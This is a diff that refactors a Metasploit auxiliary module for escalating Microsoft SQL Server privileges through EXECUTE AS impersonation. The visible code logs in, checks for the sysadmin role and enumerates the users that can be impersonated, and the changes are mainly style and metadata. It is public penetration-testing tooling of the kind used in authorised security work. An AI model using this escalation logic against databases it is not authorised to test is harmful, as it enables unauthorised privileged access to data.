@@ -3,34 +3,41 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::MSSQL
   include Msf::OptionalSession::MSSQL
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Microsoft SQL Server Escalate EXECUTE AS',
-      'Description' => %q{
-        This module can be used escalate privileges if the IMPERSONATION privilege has been
-        assigned to the user. In most cases, this results in additional data access, but in
-        some cases it can be used to gain sysadmin privileges.
-      },
-      'Author'      => ['nullbind <scott.sutherland[at]netspi.com>'],
-      'License'     => MSF_LICENSE,
-      'References'  => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SQL Server Escalate EXECUTE AS',
+        'Description' => %q{
+          This module can be used escalate privileges if the IMPERSONATION privilege has been
+          assigned to the user. In most cases, this results in additional data access, but in
+          some cases it can be used to gain sysadmin privileges.
+        },
+        'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],
+        'License' => MSF_LICENSE,
+        'References' => [['URL', 'http://msdn.microsoft.com/en-us/library/ms178640.aspx']],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
   end
 
   def run
     if session
-      set_session(session.client)
+      set_mssql_session(session.client)
     else
       print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
       if mssql_login_datastore
         print_good('Connected.')
       else
-        print_error("Login was unsuccessful. Check your credentials.")
+        print_error('Login was unsuccessful. Check your credentials.')
         disconnect
         return
       end
@@ -45,23 +52,23 @@ class MetasploitModule < Msf::Auxiliary
       print_good("#{datastore['USERNAME']} has the sysadmin role, no escalation required.")
       disconnect
       return
-    else
-      print_status("You're NOT a sysadmin, let's try to change that.")
     end
 
+    print_status("You're NOT a sysadmin, let's try to change that.")
+
     # Get a list of the users that can be impersonated
-    print_status("Enumerating a list of users that can be impersonated...")
+    print_status('Enumerating a list of users that can be impersonated...')
     imp_user_list = check_imp_users
-    if imp_user_list.nil? || imp_user_list.length == 0
+    if imp_user_list.nil? || imp_user_list.empty?
       print_error('Sorry, the current user doesn\'t have permissions to impersonate anyone.')
       disconnect
       return
-    else
-      # Display list of users that can be impersonated
-      print_good("#{imp_user_list.length} users can be impersonated:")
-      imp_user_list.each do |db|
-        print_status(" - #{db[0]}")
-      end
+    end
+
+    # Display list of users that can be impersonated
+    print_good("#{imp_user_list.length} users can be impersonated:")
+    imp_user_list.each do |db|
+      print_status(" - #{db[0]}")
     end
 
     # Check if any of the users that can be impersonated are sysadmins
